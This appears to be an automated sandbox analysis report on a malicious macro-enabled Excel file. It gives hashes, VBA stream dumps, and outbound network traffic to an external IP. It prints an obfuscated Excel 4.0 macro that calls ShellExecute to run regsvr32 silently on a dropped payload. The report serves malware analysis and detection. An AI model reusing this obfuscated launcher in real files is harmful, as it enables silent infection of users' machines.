MD5: | 32B7E994BF13801BEBBC3697536E86AD |
SHA1: | 0BF3648CA3A0DF2E5FF3FF1A57F3E20394314242 |
SHA-256: | 3FC1222BC12CBE95C2EFC8E5E43754912AAF46E37B1D17541FA2011FAA74F613 |
SHA-512: | 75F0D7763F12045792F8A68FF5DA3E40346814F53F7CCE1CD8EB11A0857C922A2156629B2BABA3FC8C57754DCB02596929248A9313E40F91497C0266E3C66AA9 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 56539 |
Entropy (8bit): | 7.850377009214 |
Encrypted: | false |
SSDEEP: | 1536:hXUl/i43FH4c93BUJn5r3i7ct2ObLNFqFWf:hO/dthFIdS7BO/AWf |
MD5: | 8A3A81530F27C8EA5D3597C53C57E6DE |
SHA1: | 9B7503B11FD8F95656380A3DC6B3056C8F07B7AA |
SHA-256: | 4FF01EF2F667E67A0D88688505BD1B86BA3C89F90E792DB92A73BC4D15809EBC |
SHA-512: | E271FA1D22EA3AD8FA29F73D51EDC852F6EEC7C9E9992D12351AB58E59BF9AE0F1F09B2DDBA5FAD6063DE1368B4BDEB30423A0543E9D94EFF01EFB122329C455 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.75941359400182 |
TrID: |
|
File name: | sample20210111-01.xlsm |
File size: | 40268 |
MD5: | fa5350d4304c4c2ceafa435244b5a5fc |
SHA1: | fc8a20962b8cf86568b1e85be02ee9c7b62d94b2 |
SHA256: | 0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d |
SHA512: | 09cf2c537c358aea59a242b2b25129cc780bcc571e0ef611e2b1eb40078c1ff27356d1a45b1dd42249685e97b18e12173be2dde0e54bf4913fcce4b3703ea625 |
SSDEEP: | 768:1wTZYx6TBDUzVXaI4/ybclX7aV+uFdeq9AQxD2KL0gnp5zFVqJlZ:sa6aVXaPaG7zyvxDhLnzjqJlZ |
File Content Preview: | PK..........!.o.m.....*.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 2 |
OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-12-07T14:38:21Z |
Last Saved Time: | 2021-01-11T13:42:02Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Module1.bas, Stream Size: 3215 |
---|
General | |
---|---|
Stream Path: | VBA/Module1 |
VBA File Name: | Module1.bas |
Stream Size: | 3215 |
Data ASCII: | . . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Integer: |
bycilke() |
VB_Name |
MiV(sem.value) |
homepodd() |
homepodd |
Error |
Integer) |
bycilke |
Function |
ol).Name |
"!"): |
String |
"ab": |
Split(govs, |
Randomize: |
yellowsto(yel |
Next: |
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants) |
yellowsto(Oa)))) |
Integer |
yellowsto |
ol).value |
nimo(Int((UBound(nimo) |
Replace(Vo, |
Chr(sem.Row) |
Sheets(ol).Cells(homepodd, |
"ab")) |
Split(kij(ol), |
yellowsto(homepodd)) |
Rnd)) |
(Run("" |
"moreP_" |
Variant) |
Attribute |
Resume |
pagesREviewsd(Optional |
ecimovert(nimo |
ecimovert |
MsgBox |
VBA Code |
---|
|
VBA File Name: Sheet1.cls, Stream Size: 1614 |
---|
General | |
---|---|
Stream Path: | VBA/Sheet1 |
VBA File Name: | Sheet1.cls |
Stream Size: | 1614 |
Data ASCII: | . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . |
Data Raw: | 01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 e3 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Index |
VB_Name |
VB_Creatable |
Application.OnTime |
VB_Exposed |
Long) |
ResizePagess() |
VB_Customizable |
"REviewsd" |
VB_Control |
MultiPage" |
VB_TemplateDerived |
MSForms, |
False |
Attribute |
Private |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
ResizePagess |
"pages" |
VBA Code |
---|
|
VBA File Name: ThisWorkbook.cls, Stream Size: 999 |
---|
General | |
---|---|
Stream Path: | VBA/ThisWorkbook |
VBA File Name: | ThisWorkbook.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"ThisWorkbook" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 554 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 554 |
Entropy: | 5.25519546931 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 7 3 5 C 4 1 F C C 6 1 0 7 6 5 0 7 6 5 0 7 6 5 0 7 6 5 " . . D P B = " 6 E 6 C 9 D 6 8 E 3 A 8 1 B A 9 1 B A 9 1 |
Data Raw: | 49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d |
Stream Path: PROJECTwm, File Type: data, Stream Size: 86 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 86 |
Entropy: | 3.24455457963 |
Base64 Encoded: | False |
Data ASCII: | T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . |
Data Raw: | 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3574 |
Entropy: | 4.46002460936 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2060 |
Entropy: | 3.45134089702 |
Base64 Encoded: | False |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . E . . . . . . C . _ . . . : . . . . . . . . . . |
Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00 |
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 187 |
Entropy: | 1.91493173134 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00 |
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 363 |
Entropy: | 2.21122978445 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 398 |
Entropy: | 2.07709195049 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 820 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 820 |
Entropy: | 6.5044215585 |
Base64 Encoded: | True |
Data ASCII: | . 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7f 90 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()
OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-12-07T14:38:21Z |
Last Saved Time: | 2021-01-11T13:42:02Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 115 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 115 |
Entropy: | 4.80096587863 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: f, File Type: data, Stream Size: 178 |
---|
General | |
---|---|
Stream Path: | f |
File Type: | data |
Stream Size: | 178 |
Entropy: | 2.59766210867 |
Base64 Encoded: | False |
Data ASCII: | . . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . . |
Data Raw: | 00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 b0 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110 |
---|
General | |
---|---|
Stream Path: | i02/\x1CompObj |
File Type: | data |
Stream Size: | 110 |
Entropy: | 4.63372611993 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/f, File Type: data, Stream Size: 40 |
---|
General | |
---|---|
Stream Path: | i02/f |
File Type: | data |
Stream Size: | 40 |
Entropy: | 1.54176014818 |
Base64 Encoded: | False |
Data ASCII: | . . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | i02/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110 |
---|
General | |
---|---|
Stream Path: | i03/\x1CompObj |
File Type: | data |
Stream Size: | 110 |
Entropy: | 4.63372611993 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i03/f, File Type: data, Stream Size: 40 |
---|
General | |
---|---|
Stream Path: | i03/f |
File Type: | data |
Stream Size: | 40 |
Entropy: | 1.90677964945 |
Base64 Encoded: | False |
Data ASCII: | . . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i03/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | i03/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: o, File Type: data, Stream Size: 152 |
---|
General | |
---|---|
Stream Path: | o |
File Type: | data |
Stream Size: | 152 |
Entropy: | 2.68720470607 |
Base64 Encoded: | False |
Data ASCII: | . . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . . |
Data Raw: | 00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 |
Stream Path: x, File Type: data, Stream Size: 48 |
---|
General | |
---|---|
Stream Path: | x |
File Type: | data |
Stream Size: | 48 |
Entropy: | 1.42267983198 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 |
Macro 4.0 Code |
---|
CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2021 18:28:00.002847910 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.125716925 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.125803947 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.138995886 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.262025118 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.263251066 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.263308048 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.264287949 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.265647888 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.387058973 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.388211012 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.388309956 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
